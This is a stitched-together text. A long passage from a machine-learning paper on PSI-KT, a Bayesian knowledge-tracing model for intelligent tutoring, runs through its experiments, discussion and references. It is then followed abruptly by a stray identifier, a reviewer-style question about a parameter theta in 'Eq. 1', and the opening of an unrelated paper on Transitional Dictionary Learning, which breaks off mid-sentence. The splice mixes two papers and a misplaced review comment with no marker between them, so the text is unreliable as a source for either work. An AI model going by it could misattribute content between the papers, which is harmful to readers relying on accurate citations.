traits \( s \). The dynamics of knowledge states (Eqs. 4–6) are parameterized by learner-specific cognitive traits \( (\alpha^\ell_n, \mu^\ell_n, \sigma^\ell_n, \gamma^\ell_n) \), which we collectively denote \( s^\ell_n \). Specifically, \( \alpha^\ell \) represents the forgetting rate (Ebbinghaus, 1885; Averell & Heathcote, 2011), \( \mu^\ell \) (via \( \mu^\ell_n \)) captures long-term memory consolidation (Meeter & Murre, 2004) for practiced KCs and expected performance for novel KCs, \( \sigma^\ell \) quantifies knowledge volatility, and \( \gamma^\ell \) measures transfer ability (Bassett & Mattar, 2017) from knowledge of prerequisite KCs. These traits can develop during learning according to Eq. 1, starting from a Gaussian prior \( p_\theta(s^\ell_1) = \mathcal{N}(s^\ell_1 | \bar{s}, R_1) \) where \( \bar{s} \in \mathbb{R}^4 \) and the diagonal matrices \( H, R_1, R \in \mathbb{R}^{4 \times 4} \) are also part of the global parameters \( \theta \). Shared prerequisite graph \( A \). In our model, prerequisite relations influence knowledge dynamics via the coupling introduced in Eq. 5. We now discuss an appropriate parameterization for the weight matrix of the prerequisite graph, \( A := \{a^{ik}\}_{i,k=1:K} \). We assume that prerequisites are time- and learner-independent so that, in the spirit of collaborative filtering (Breese et al., 2013), we can pool evidence from all learners to estimate them. To prevent a quadratic scaling in the number of KCs, we do not directly model edge weights but derive them from KC embedding vectors \( u^k \) in lower dimension \( u^k \in \mathbb{R}^D \) with \( D \ll K \), collected in embedding matrix \( U_{K \times D} \). A basic integrity constraint for a connected pair is that dependence of KC \( i \) on KC \( k \) should trade off against that of \( k \) on \( i \), i.e., no mutual prerequisites: \( a^{ik} + a^{ki} = 1 \). With this in mind, we exploit the factorization of \( a^{ik} \) introduced by Lippe et al. (2021) in terms of a separate probability of edge existence \( p(i \rightarrow k) \) and definite directionality \( p(i \rightarrow k | i \rightarrow k) \): \[ a^{ik} := p(i \rightarrow k | i \rightarrow k) p(i \rightarrow k) \] \[ = \text{sigmoid}((u^i)^T u^k) \text{ sigmoid}((u^i)^T (M - M^T) u^k), \] (7) where the skew-symmetric combination \( M - M^T \) of a learnable matrix \( M \) prevents mutual prerequisites. Having presented the generative model, we now turn to inference and prediction. 3.2 Approximate Bayesian Inference and Amortization with a Neural Network We now describe how we learn the generative model parameters \( \theta \) and how we infer the latent states \( s, z \) introduced in Section 3.1 using a neural network (“inference network”). Since learner-specific latent states \( s \) and \( z \) are deducible solely from limited individual data, we expect non-negligible uncertainty. This motivates our probabilistic treatment of these states using approximate Bayesian inference. By contrast, the model parameters \( \theta \) (KC parameters \( U, M \) in Eq. 7, transition parameters \( \bar{s}, H, R_1, R \) in Eq. 1, and \( \bar{z}, w_1 \) in Eq. 2) can be estimated from all learners, and we thus \(^1\)Särkkä & Solin (2019) — the variance is \( w^\ell_n = (\sigma^\ell_n)^2 (1 - e^{-2\alpha^\ell_n \tau^\ell_n})/(2\alpha^\ell_n) \). treat them as point-estimated parameters as described below (detailed derivation in Appendix A.1.) Here, without loss of generality, we show the inference for a single learner. ### 3.2.1 Inference on a Fixed Learning History Here, we assume the full interaction history \( H_{1:N}^\ell \) is available for inferring the posterior over latents \( p_\theta(z_{1:N}^\ell, s_{1:N}^\ell | y_{1:N}^\ell) \). We approach the problem using variational inference (VI). In VI, we select a distribution family \( q_\phi \) with free parameters \( \phi \) to approximate the posterior \( p_\theta \) by minimizing their Kullback-Leibler divergence. This can only be done indirectly, by maximizing a lower bound to the marginal probability of the data, the evidence lower bound (ELBO). Here, we adopt the mean-field approximation \( q_\phi(z_{1:N}^\ell, s_{1:N}^\ell | y_{1:N}^\ell) = q_\phi(z_{1:N}^\ell) q_\phi(s_{1:N}^\ell) \) and jointly optimize the generative \( \theta \) and variational \( \phi \) parameters using variational expectation maximization (EM; Dempster et al., 1977; Beal & Ghahramani, 2003; Attias, 1999). Motivated by real-world scalability, we introduce an inference network (see Appendix A.3 for the architecture) to amortize the learning of variational parameters \( \phi \) across learners, and we employ the reparametrization trick (Kingma & Welling, 2014) to optimize the single-learner ELBO: \[ \text{ELBO}^\ell(\theta, \phi) = \mathbb{E}_{q_\phi(s_{1:N}^\ell)} \left[ -\log q_\phi(s_{1:N}^\ell) + \log p_\theta(s_{1:N}^\ell) + \sum_{n=2}^{N} \log p_\theta(s_n^\ell | s_{n-1}^\ell) \right] \\ + \mathbb{E}_{q_\phi(z_{1:N}^\ell)} \left[ -\log q_\phi(z_{1:N}^\ell) + \log p_\theta(z_1^\ell) + \sum_{n=1}^{N} \log p_\theta(y_n^\ell | z_n^\ell, x_n) \right] \\ + \mathbb{E}_{q_\phi(z_{1:N}^\ell) q_\phi(s_{1:N}^\ell)} \left[ \sum_{n=2}^{N} \log p_\theta(z_n^\ell | z_{n-1}^\ell, s_n^\ell) \right]. \] The SSM emissions and transitions were introduced in Eqs. 1-3, along with the respective initial priors. To allow for a diversity of combinations of learner traits to account for the data, we model the variational posterior across learners, \( q_\phi(s_{1:N}) \), as a mixture of Gaussians (see Appendix A.4). ### 3.2.2 Inference in Continual Learning In real-world educational settings, a KT model must flexibly adapt its current variational parameters \( \phi_n \) with newly available interactions \((x_{n+1}^\ell, t_{n+1}^\ell, y_{n+1}^\ell)\). Retraining on a fixed, augmented history \( H_{n+1}^\ell \) to obtain an updated \( \phi_{n+1} \) is possible (Eq. 8), but expensive. Instead, in PSI-KT, we use the parameters \( \phi_n \) of the current posterior \( q_{\phi_n}(z_n^\ell, s_n^\ell) \) to form a next-time prior, \[ \tilde{p}(z_{n+1}^\ell, s_{n+1}^\ell) := \mathbb{E}_{q_{\phi_n}(z_n^\ell, s_n^\ell | y_{1:n}^\ell)} \left[ p_\theta(s_{n+1}^\ell | s_n^\ell) p_\theta(z_{n+1}^\ell | s_{n+1}^\ell, z_n^\ell) \right]. \] Due to the Bayesian nature of our model, we can now update this prior with the new evidence \( y_{n+1}^\ell \) at time \( t_{n+1}^\ell \) using variational continual learning (VCL; Nguyen et al., 2017; Loo et al., 2020), i.e., by maximizing the ELBO: \[ \text{ELBO}^\ell_{\text{VCL}}(\theta, \phi_{n+1}) = \mathbb{E}_{q_{\phi_{n+1}}(s_{n+1}^\ell)} \left[ -\log q_{\phi_{n+1}}(s_{n+1}^\ell) \right] \\ + \mathbb{E}_{q_{\phi_{n+1}}(z_{n+1}^\ell)} \left[ -\log q_{\phi_{n+1}}(z_{n+1}^\ell) + \log p_\theta(y_{n+1}^\ell | z_{n+1}^\ell, x_{n+1}^\ell) \right] \\ + \mathbb{E}_{q_{\phi_{n+1}}(z_{n+1}^\ell, s_{n+1}^\ell)} \left[ \log \tilde{p}(z_{n+1}^\ell, s_{n+1}^\ell) \right]. \] Maximizing this ELBO\(^\ell_{\text{VCL}}\) allows us to update the parameters \( \phi_{n+1} \) based on a new interaction \((x_{n+1}^\ell, t_{n+1}^\ell, y_{n+1}^\ell)\) directly from the previous parameters \( \phi_n \), i.e., without retraining. ### 3.3 Predictions To predict a learner’s performance on KC \( x_{n+1}^\ell \) at \( t_{n+1}^\ell \), we take the current variational distributions over \( s_n^\ell \) and \( z_n^\ell \) and transport them forward by analytically convolving them with the respective transition kernels (Eqs. 1 and 2). We then draw \( z_{n+1}^\ell \) from the resulting distribution, and predict the outcome \( y_{n+1}^\ell \) by Eq. 3. When predicting multiple steps ahead, we repeat this procedure without conditioning on any of the previously predicted \( y_{n+m}^\ell \). ### 4 Evaluations We argue above that KT for personalized education must predict accurately, scale well with new data, and provide interpretable representations. We now empirically assess these desiderata, comparing PSI-KT with up to 8 baseline models across three datasets from online education platforms. Concretely, we evaluate (i) prediction accuracy, | Dataset → | Assist12 | Assist17 | Junyi15 | |-----------|----------|----------|---------| | # Learners \( L \) | 46,674 | 1,709 | 247,606 | | # KCs \( K \) | 263 | 102 | 722 | | # Inf's / 10^6 | 3.5 | 0.9 | 26 | Table 1: Dataset characteristics quantifying both within-learner prediction and between-learner generalization (Sec. 4.1), (ii) scalability in a continual learning setting (Sec. 4.2), and (iii) interpretability of learner representations and prerequisite relations (Sec. 4.3). Datasets. Assistments and Junyi Academy are non-profit online learning platforms for pre-college mathematics. We use Assistments’ 2012 and 2017 datasets\(^2\) (Assist12 and Assist17) and Junyi’s 2015 dataset\(^3\) (Junyi15; Chang et al., 2015), which in addition to interaction data, provides human-annotated KC relations (see Table 1 and Appendix A.3.2 for details). We select hlr from Duolingo and ppe as two influential psychologically-informed regression models. From the models that use learnable representations, we include two established deep learning benchmarks, DKT and DKTF, which capture complex dynamics via LSTM networks, as well as the interpretability-oriented QIKT. 4.1 Prediction and Generalization Performance In our evaluations, we mainly focus on prediction and generalization when training on 10 interactions from up to 1000 learners. Good KT performance with little data is key in practical ITS to minimize the number of learners on an experimental treatment (principle of equipoise, similar to medical research; Burkholder, 2021), to mitigate the cold-start problem, and to extend the usefulness of the model to classroom-size groups. To provide ITS with a basis for adaptive guidance and long-term learner assessment, we always predict the 10 next interactions. Figure 2 shows that PSI-KT’s within-learner prediction performance is robustly above baselines for all but the largest cohorts (>60k learners, Junyi15), where all deep learning models perform similarly. The advantage of PSI-KT comes from its combined modeling of KC prerequisite relations and individual learner traits that evolve in time (see Appendix Fig. 13 for ablations). The between-learner generalization accuracy of the models above, when tested on 100 out-of-sample learners, is shown in Table 2, where fine-tuning indicates that parameters were updated using (10-point) learning histories from the unseen learners. PSI-KT shows overall superior generalization except on Junyi15 (when fine-tuning). 4.2 Scalability in Continual Learning In addition to training on fixed historical data, we also conduct experiments to demonstrate PSI-KT’s scalability when iteratively retraining on additional interaction data from each learner. This parallels real-world educational scenarios, where learners are continuously learning (Sec. 3.2.2). Each model is initially trained on 10 interactions from 100 learners. We then incrementally provide one data point from each learner, and evaluate the training costs and prediction accuracy. Figure 3 shows PSI-KT requires the least retraining time, retains the best prediction accuracy, and thus achieves the most favorable cost-accuracy trade-off (details in Appendix A.5.3). 4.3 Interpretability of Representations We now evaluate the interpretability of both learner-specific cognitive traits \(s^\ell\) and the prerequisite graphs \(A\). We first show that our model captures learner-specific and disentangled traits that correlate with behavior patterns. Next, we show that our inferred graphs best align with ground truth graphs, and the edge weights predict causal support on downstream KCs. 4.3.1 Learner-Specific Cognitive Traits For each learner, psi-KT infers four latent traits, each with a clear dynamical role specified by the OU process (Eqs. 5-6). In contrast, high-performance baselines (AKT, DKT, and DKTF) describe learners via 16-dimensional embeddings solely constrained by network architecture and loss minimization. Another model QIKT constructs 3-dimensional embeddings with each element connected --- \(^2\)https://sites.google.com/site/assistmentsdata \(^3\)https://pslcdatashop.web.cmu.edu/DatasetInfo?datasetId=1198 Table 2: Prediction accuracy. FT indicates additional fine-tuning and ↑ indicates larger values are better. The best model performance is in bold and the 2nd best is underlined. | Dataset | Experiment | HLR | PPE | DKT | DKTF | HKT | AKT | GKT | QIKT | PSI-KT | |---------|------------|-----|-----|-----|------|-----|-----|-----|------|--------| | Assist12 | Within ↑ | .54 .03 | .65 .01 | .65 .03 | .60 .01 | .55 .01 | .67 .02 | .63 .03 | .63 .03 | .68 .02 | | | Between ↑ | .50 .03 | .50 .02 | .55 .02 | .51 .01 | .54 .00 | .58 .02 | .61 .02 | .60 .02 | .61 .03 | | | w/ FT ↑ | .52 .02 | .53 .01 | .58 .00 | .55 .01 | .55 .00 | .61 .00 | .62 .02 | .60 .03 | .62 .02 | | Assist17 | Within | .45 .01 | .53 .02 | .57 .02 | .53 .03 | .52 .03 | .56 .02 | .56 .04 | .58 .02 | .63 .02 | | | Between | .33 .03 | .51 .02 | .51 .00 | .48 .00 | .51 .02 | .47 .01 | .53 .02 | .50 .02 | .53 .02 | | | w/ FT | .41 .04 | .51 .00 | .51 .03 | .53 .01 | .51 .03 | .51 .02 | .54 .03 | .51 .04 | .56 .02 | | Junyi15 | Within | .55 .02 | .66 .03 | .79 .03 | .78 .01 | .63 .02 | .81 .02 | .78 .02 | .81 .02 | .83 .02 | | | Between | .48 .02 | .55 .02 | .76 .00 | .76 .02 | .61 .01 | .73 .01 | .77 .03 | .76 .03 | .79 .03 | | | w/ FT | .52 .00 | .65 .03 | .81 .01 | .84 .01 | .64 .03 | .83 .00 | .79 .03 | .80 .03 | .80 .02 | Figure 3: Continual learning. (Top) Cumulative training time. (Bottom) Prediction accuracy on the next 10 time steps. We omit results when time is above, or accuracy is below, the range of the axes. to scores of knowledge acquisition, knowledge mastery, and problem-solving. We collectively refer to these learner-specific variables as learner representations. Here, we empirically show that PSI-KT representations provide superior interpretability. We ask that learner representations be 1) specific to individual learners, 2) consistent when trained on partial learning histories, 3) disentangled (i.e., component-wise meaningful, as in Bengio et al., 2013), and 4) operationally interpretable, so that they can be used to personalize future curricula. We evaluate desiderata 1-3 with information-theoretic metrics (Table 3; see Appendix A.6 for details), and desideratum 4 with regressions against behavioral outcomes (Table 4). Specificity, consistency, and disentanglement. Learner representations $s$ should be maximally specific about learner identity $\ell$, which can be quantified by the mutual information $MI(s; \ell) = H(s) - H(s|\ell)$ being high, where $H$ denotes (conditional) entropy. Additionally, when we infer representations $s_{\ell_{sub}}$ from different subsets of the interactions of a fixed learner, they should be consistent, i.e., each $s_{\ell_{sub}}$ should be minimally informative about the chosen subset (averaged across subsets), such that $\mathbb{E}_{\ell_{sub}}[MI(s'; s_{\ell_{sub}})] = \mathbb{E}_{\ell_{sub}}[H(s|\ell) - H(s|\ell_{sub})]$ should be low. Note that sequential subsets are unsuitable for this evaluation, since representations evolve in time to track learners’ progression. Instead, we define subsets as groups of KCs whose average presentation time is approximately uniform over the duration of the experiment (see Appendix A.6.1 for details). Lastly, learner representations should be disentangled, such that each dimension is individually informative about learner identity. We measure disentanglement with $D_{KL}(s||\ell) := H(s) - H(s|\ell)_{\text{diag}}$, a form of specificity that ignores correlations across $s_\ell$ dimensions by estimating the conditional entropy only with diagonal covariances. In empirical evaluations (Table 3), PSI-KT’s representations offer competitive specificity despite being lower-dimensional, and outperform all baselines in consistency and disentanglement. While disentanglement aids interpretability (Freiesleben et al., 2022), it does not itself entail domain-specific meaning for representational dimensions. We now demonstrate that PSI-KT representations correspond to clear behavioral patterns, which is crucial for future applications in educational settings. Operational interpretability. Having shown that PSI-KT captures specific, consistent, and disentangled learner features, we now investigate whether these features relate to meaningful aspects of future Table 3: Specificity, consistency, and disentanglement vs. best baseline. | Metric | Dataset | Baseline | PSI-KT | |--------------|---------|----------|--------| | Specificity | Assist12| 8.8 | 8.4 | | MI(s; \ell) ↑| Assist17| 10.1 | 10.0 | | | Junyi15 | 13.5 | 14.4 | | Consistency −1| Assist12| 12.2 | 7.4 | | | Assist17| 6.4 | 6.4 | | | Junyi15 | 7.7 | 5.0 | | Disentanglement| Assist12| 2.3 | 7.4 | | | Assist17| 0.6 | 8.4 | | | Junyi15 | 5.0 | 11.5 | behavior, which would be useful for scheduling operations for ITS. We indeed find that the learner representations of PSI-KT forecast interpretable behavioral outcomes, such as performance decay or initial performance on novel KCs. Concretely, consider the observed one-step performance difference $\Delta y^\ell_n := y^\ell_n - y^\ell_{n-1}$. We expect it to be lower for longer intervals $\tau^\ell_n = t^\ell_n - t^\ell_{n-1}$ due to forgetting. However, we recognize no clear trend when plotting $\Delta y^\ell_n$ over $\tau^\ell_n$ for the Junyi15 dataset (Fig. 4, top right). We can explain this observation because different learners forget on different time scales. Plotting the same test data instead over scaled intervals $\tau^\ell_n \alpha^\ell_n$ (Fig. 4, top center) shows a clear trend against an exponential fit (solid line) with less variability, demonstrating that $\alpha^\ell_n$ (derived from past data only) adjusts for individual learner characteristics and can be interpreted as a personalized rate of forgetting. Here, the choice of the factor $\alpha^\ell_n$ is motivated by our inductive bias (Eq. 4). The trend is much less clear for all baselines: Fig. 4 (top left) uses the best fitting component across all learner representations from all baselines (full results in Fig. 8 in Appendix A.6.4). Analogously, when we consider initial performance on a novel KC, we find for PSI-KT that $\hat{\mu}^{\ell,k}_n$ (which aggregates mastery of prerequisites for KC $k$ at time $t_n$, see Eq. 5) explains it better than the best baseline Fig. 4 (bottom panels). Table 4 shows that these superior interpretability results are significant and hold across all datasets. In Appendix A.6.4, we discuss two more behavioral signatures (performance variability and prerequisite influence) and show they correspond to the remaining components $\gamma^\ell_n$ and $\sigma^\ell_n$. ### 4.3.2 PREREQUISITE GRAPH PSI-KT infers a prerequisite graph based on all learners’ data, which helps it to generalize to unseen learners. Beyond helping prediction, reliable prerequisite relations are an essential input for curriculum design, motivating our interest in their interpretability. Figure 5a shows an exemplary inferred subgraph with the prerequisites of a single KC. To quantitatively evaluate the graph, we (i) measure the alignment of the inferred vs. ground-truth graphs and (ii) correlate inferred prerequisite probability with a Bayesian measure of causal support obtained from unseen behavioral data. #### Alignment with ground-truth graphs. We analyze the Junyi15 dataset, which uniquely provides human-annotated evaluations of prerequisite and similarity relations between KCs. We discuss here the alignment of prerequisites and leave similarity for Appendix A.7. The Junyi15 dataset provides both an expert-identified prerequisite for each KC and crowd-sourced ratings (6.6 ratings on average on a 1-9 scale). To compare with expert annotations, we compute the rank of each expert-identified prerequisite relation $i \rightarrow k$ in the relevant sorted list of inferred probabilities $\{a^{ik}\}_{j=1}^{K}$ and take the harmonic average (mean reciprocal rank, MRR; Yang et al., 2014). Next, we compute the negative log-likelihood (nLL) of inferred edges $a^{ik}$ using a Gaussian estimate of the (rescaled) crowd-sourced ratings for the $i \rightarrow k$ KC pair. We finally calculate the Jaccard similarity (JS) between the set of inferred edges ($a^{ik} > 0.5$) and those identified by experts as well as crowd-sourced edges with average ratings above 5. The results in Table 5 (left columns) consistently highlight PSI-KT’s superior performance across all criteria (see Appendix A.7.1 for details). #### Causal support across consecutive interactions. For education applications, we are interested in how KC dependencies impact learning effectiveness. If KC $i$ is a prerequisite of KC $k$, mastering KC $i$ contributes to mastering KC $k$, indicating a causal connection. In this analysis, we show that inferred edge probabilities $a^{ij}$ (Eq. 7) correspond to causal support $i \rightarrow j$ (Eq. 11), derived from behavioral data through Bayesian causal induction (Griffiths & Tenenbaum, 2009). Specifically, we model the relationship between a candidate cause $C$ and effect $E$, i.e., a pair of KCs in our case, while accounting for a constant background cause $B$, representing the learner’s overall ability and the influences of other KCs. We consider two hypothetical causal graphs, where Graph 0 $G_{i \rightarrow k}$ represents ![Figure 4](image.png) **Figure 4:** Operational interpretability of representations, Junyi15 dataset. See text for axes labels and Appendix A.6.4 for additional results. | Behavioural signature | Dataset | Best Baseline | PSI-KT | |-----------------------|---------|---------------|--------| | Performance difference | Assist12 | 0.01, .67 | 0.30, <.001 | | | Assist17 | −0.03, .30 | 0.56, <.001 | | | Junyi15 | 0.03, .06 | 0.72, <.001 | | Initial performance | Assist12 | 0.04, .01 | 0.54, <.001 | | | Assist17 | 0.05, .01 | 3.70, <.001 | | | Junyi15 | 0.04, .02 | 0.92, <.001 | **Table 4:** Coefficients and $p$-values of regressions relating $\exp(-\alpha^\ell_n \tau^\ell_n)$ and $\hat{\mu}^{\ell,k}_n$ to unseen behavioral data across datasets. Table 5: (Left) Alignment of inferred graphs with annotated graphs for the Junyi15 dataset. (Right) Regression coefficients and p-values relating causal support to inferred edge probabilities. All baseline models either lack significance or negatively predict causal support (Appendix Fig. 12). | Metric | MRR ↑ | JS expert ↑ | JS crowd ↑ | nLL ↓ | coefficient ↑, p-value ↓ | |--------|-------|-------------|------------|-------|--------------------------| | Dataset | | | | | | | Junyi15 | .0082 | .0015 | .0047 | 3.03 | 1.05, .253 | | PSI-KT | .0086 | .0019 | .0095 | 4.11 | 1.15, .003 | Figure 5: Graph interpretability. (a) Subgraph inferred by PSI-KT on the Junyi15 dataset, showing prerequisites of target KC ‘area of parallelograms’. (b) Hypothesized causal graphs, where Graph 1 assumes a causal relationship exists from KC i to KC k, while Graph 0 is the null hypothesis. (c) Regression of edge probabilities against causal supports. Insets show the best baseline model. the null hypothesis of no causal relationship, and Graph 1 \( G_{i \rightarrow k} \) assumes the causal relationship exists, i.e. correct performance on KC i causally supports correct performance on KC k (Fig. 5b). We estimate causal support for each pair of KCs \( i \rightarrow k \) based on all consecutive interactions in the behavioral data \( H \) from KC i at time \( t_n \) to KC k at time \( t_{n+1} \), as a function of the difference in log-likelihoods of the two causal graphs (see Appendix A.7.3 for details): \[ \text{support}_{i \rightarrow k} := \log P(H | G_{i \rightarrow k}) - \log P(H | G_{i \rightarrow k}). \] We then use regression to predict \( \text{support}_{i \rightarrow k} \) as a function of edge probabilities \( a^{ij} \) inferred from different models. The results are visualized in Figure 5c and summarized in Table 5 (right). The larger coefficients indicate that our inferred graphs possess superior operational interpretability (Sec. 4.3). 5 DISCUSSION We propose PSI-KT as a novel approach to knowledge tracing (KT) with compelling properties for intelligent tutoring systems: superior predictive accuracy, excellent continual-learning scalability, and interpretable representations of learner traits and prerequisite relationships. We further find that PSI-KT has remarkable predictive performance when trained on small cohorts whereas baselines require training data from at least 60k learners to reach similar performance. An open question for future KT research is how to combine PSI-KT’s unique continual learning and interpretability properties with performance that grows beyond this extreme regime. We use an analytically marginalizable Ornstein-Uhlenbeck process for knowledge states in PSI-KT, resulting in an exponential forgetting law, similar to most recent KT literature. Future work should support ongoing debates in cognition by offering alternative modeling choices for memory decay (e.g., power-law; Wixted & Ebbesen, 1997), thus facilitating empirical studies at scale. And while our model already normalizes reciprocal dependencies in the prerequisite graph, we anticipate that enforcing regional or global structural constraints, such as acyclicity, may benefit inference and interpretability. Although we designed PSI-KT with general structured domains in mind, our empirical evaluations were limited to mathematics learning by dataset availability. We highlight the need for more diverse datasets for structured KT research to strengthen representativeness in ecologically valid contexts. Overall, our work combines machine learning techniques with insights from cognitive science to derive a predictive and scalable model with psychologically interpretable representations, thus laying the foundations for personalized and adaptive tutoring systems. ACKNOWLEDGMENTS The authors thank Nathanael Bosch and Tim Xiao for their helpful discussion, and Seth Axen for code review. The authors thank the International Max Planck Research School for Intelligent Systems (IMPRS-IS) for supporting Hanqi Zhou. This research was supported as part of the LEAD Graduate School & Research Network, which is funded by the Ministry of Science, Research and the Arts of the state of BadenWürttemberg within the framework of the sustainability funding for the projects of the Excellence Initiative II. Funded by the Deutsche Forschungsgemeinschaft (DFG, German Research Foundation) under Germany’s Excellence Strategy – EXC number 2064/1 – Project number 390727645. CMW is supported by the German Federal Ministry of Education and Research (BMBF): Tübingen AI Center, FKZ: 01IS18039A. ETHICS STATEMENT We evaluated our PSI-KT model on three public datasets from human learners, which all anonymize the data to protect the identities of individual learners. Although PSI-KT aims to improve personalized learning experiences, it infers cognitive traits from behavioral data instead of using learners’ demographic characteristics (e.g., age, gender, and the name of schools provided in the Assitment 17 dataset), to avoid reinforcing existing disparities. Evaluations of structured knowledge tracing in our paper are limited by dataset availability to pre-college mathematics. To ensure a broader and more ecologically valid assessment, it is essential to explore diverse datasets across various domains (e.g., biology, chemistry, linguistics) and educational stages (from primary to college level). This will allow for a more comprehensive understanding of the role of structure in learning. REFERENCES Terry A Ackerman. Multidimensional item response theory models. Wiley StatsRef: Statistics Reference Online, 2014. Hagai Attias. A variational bayesian framework for graphical models. Advances in neural information processing systems, 12, 1999. Lee Averell and Andrew Heathcote. The form of the forgetting curve and the fate of memories. Journal of Mathematical Psychology, 55:25–35, 02 2011. Ryan SJ d Baker, Albert T Corbett, and Vincent Aleven. More accurate student modeling through contextual estimation of slip and guess probabilities in bayesian knowledge tracing. In Intelligent Tutoring Systems: 9th International Conference, ITS 2008, Montreal, Canada, June 23-27, 2008 Proceedings 9, pp. 406–415. Springer, 2008. Danielle S Bassett and Marcelo G Mattar. A network neuroscience of human learning: potential to inform quantitative theories of brain and behavior. Trends in cognitive sciences, 21(4):250–264, 2017. Matthew J Beal and Zoubin Ghahramani. The variational bayesian em algorithm for incomplete data: with application to scoring graphical model structures. Bayesian statistics, 7:453–464, 2003. Yoshua Bengio, Aaron Courville, and Pascal Vincent. Representation learning: A review and new perspectives. IEEE transactions on pattern analysis and machine intelligence, 35(8):1798–1828, 2013. David M Blei, Alp Kucukelbir, and Jon D McAuliffe. Variational inference: A review for statisticians. Journal of the American statistical Association, 112(518):859–877, 2017. F Brändle, M Binz, and E Schulz. Exploration beyond bandits. In The Drive for Knowledge: The Science of Human Information-Seeking, pp. 147–168. Cambridge University Press, 2022. John S Breese, David Heckerman, and Carl Kadie. Empirical analysis of predictive algorithms for collaborative filtering. arXiv preprint arXiv:1301.7363, 2013. Leslie Burkholder. Equipoise and ethics in educational research. Theory and Research in Education, 19(1):65–77, 2021. doi: 10.1177/14778785211009105.
uqxBTcWRnj
How can $theta$ be optimized in Eq. 1 if it does not appear in the two terms? The definition of the decoder g(·) is not consistent. Does it take $theta$ as a condition or not? Seemingly Eq. 2 is the appropriate form.
Bridging Neural and Symbolic Representations with Transitional Dictionary Learning Junyan Cheng Thayer School of Engineering Dartmouth College Hanover, NH 03755, USA [email protected] Peter Chin Thayer School of Engineering Dartmouth College Hanover, NH 03755, USA [email protected] Abstract This paper introduces a novel Transitional Dictionary Learning (TDL) framework that can implicitly learn symbolic knowledge, such as visual parts and relations, by reconstructing the input as a combination of parts with implicit relations. We propose a game-theoretic diffusion model to decompose the input into visual parts using the dictionaries learned by the Expectation Maximization (EM) algorithm, implemented as the online prototype clustering, based on the decomposition results. Additionally, two metrics, clustering information gain, and heuristic shape score are proposed to evaluate the model. Experiments are conducted on three abstract compositional visual object datasets, which require the model to utilize the compositionality of data instead of simply exploiting visual features. Then, three tasks on symbol grounding to predefined classes of parts and relations, as well as transfer learning to unseen classes, followed by a human evaluation, were carried out on these datasets. The results show that the proposed method discovers compositional patterns, which significantly outperforms the state-of-the-art unsupervised part segmentation methods that rely on visual features from pre-trained backbones. Furthermore, the proposed metrics are consistent with human evaluations. 1 Introduction In recent years, there has been a desire to incorporate the interpretability, compositionality, and logistics of symbolic systems into neural networks (NNs). Existing methods combine them in an ad hoc manner. Dong et al. (2019); Wang et al. (2019) converts symbolic programs into differentiable forms. Cornelio et al. (2023); Segler et al. (2018) introduce symbolic modules to assist NNs. Gupta & Kembhavi (2023) use neural and symbolic modules as building blocks for visual programs. These methods do not truly bring symbolic power to NNs, but simply allow them to work synergically. The essential disparity lies at a low level. NNs use distributed representations, while symbolic systems use symbolic representations. This motivates us to explore ways to bridge neural and symbolic representations, thus combining the two types of intelligence from the ground up. Cognitive science studies (Taniguchi et al., 2018) have suggested that symbolic representation in the human brain does not appear out of nowhere; rather, there is a gradual transition from neural perception to preliminary symbols and eventually to symbolic languages over the course of human evolution, as people observe and interact with their environment. The transitional representation, preliminary symbols, is essential in connecting neural and symbolic representation. Taking this concept into account, we attempt to replicate the process of transitional representation arising from neural representation, through unsupervised learning on visual observations in this study, as an exploration of the potential path of unifying neural and symbolic thinking at the representation level. Representation explains how the input is made up of reusable components (Bengio et al., 2013). Taking visual observations as an example, distributed representation is explained by vectors, such as principal components, that illustrate the high-dimensional statistical features, and symbolic representation uses structural methods, such as logic sentences, that explain the visual parts and their connections. A transitional representation should be in between that (1) contains high-dimensional details of the input and (2) implies structural information about the semantics of the input. Figure 1: Decomposing samples from three datasets into visual parts marked with different colors, shallowness represents confidence. Odd columns are input, even columns are decompositions. We propose a novel Transitional Dictionary Learning (TDL) framework that implicitly learns symbolic knowledge, such as visual parts and relations, by reconstructing the input as a combination of parts with implicit relations. With a simple fine-tuning that aligns the output with human preference through reinforcement learning and a heuristic reward, the model can give a human-interpretable decomposition of the input; examples are shown in Figure 1. TDL uses an Expectation Maximization (EM) algorithm to iteratively update dictionaries that store hidden representations of symbolic knowledge, through an online prototype clustering on the visual parts decomposed from the inputs by a novel game-theoretic diffusion model using the current dictionaries. We suggest two metrics to evaluate the learned representation. Clustering Information Gain, which assesses if the learned dictionary is parsimonious and representative, and a heuristic shape score that assesses if the decompositions are in line with human intuition. We conduct unsupervised learning experiments on three abstract compositional visual object datasets, which require the model to utilize the compositionality of data instead of simply visual features, and three tasks on symbol grounding to predefined classes of parts and relations, and transfer learning to unseen classes. The results show huge improvements compared to the state-of-the-art part segmentation baselines, which struggle to process abstract objects that lack distinct visual features. We also conduct human evaluations; the results demonstrate significantly improved interpretability of the proposed method and the proposed metrics are consistent with human assessments. Our contributions are concluded as follows. - We propose the unsupervised Transitional Dictionary Learning to learn symbolic features in representations with a novel game-theoretic diffusion model and online prototype clustering. - We introduce two metrics, the clustering information gain and the heuristic shape score, to evaluate the learned representation and give evaluation results agreed to human judgment. - We perform experiments, compare our method with state-of-the-art unsupervised part segmentation models, and conduct human evaluations for all models and proposed metrics. Our code and data are available at https://github.com/chengjunyan1/TDL 2 RELATED WORK Neural-Symbolic Learning. Some approaches incorporate a symbolic program to assist NNs. Segler et al. (2018) used a tree search in learning retrosynthetic routes, Amizadeh et al. (2020) applied first-order logic to answer visual questions, and Young et al. (2019) introduced a symbolic controller to generate repeating visual patterns. However, they are usually tailored to specific tasks. Program synthesis could be more flexible. Inala et al. (2020) synthesized multi-agent communication policies, Sun et al. (2021) searched for autonomous vehicle control programs, and Gupta & Kembhavi (2023) synthesized visual task scripts. Nevertheless, symbolic thinking was not truly incorporated. Thus, differentiable symbolic modules are proposed. Wang et al. (2019) relaxed an SAT solver as a NN layer, Riegel et al. (2020) made first-order logic propositions differentiable, Dong et al. (2019) used NNs as trainable logical functions, Dai et al. (2019) optimized NN with abductive logic, and Goyal et al. (2021) learned neural production systems of visual entities. However, they overlooked the fact that the disparity between neural and symbolic representations is the source of the problem. Compositional Representation. Fei-Fei & Perona (2005); Csurka et al. (2004) show early efforts to learn compositionality through the bag of words. Hinton (2021) proposed an architecture to learn part-whole hierarchies, which Garau et al. (2022) implemented using an attention model. Du et al. (2020) employed Energy-Based Models (EBMs) to learn compositional parts for image generation. Chen et al. (2020) learned to compose programs from basic blocks. Mendez et al. (2022) learned reusable compositions for lifelong learning. Lake et al. (2015) used Bayesian Program Learning to compose handwritten characters from parts and strokes. Shanahan et al. (2020) used attention to learn 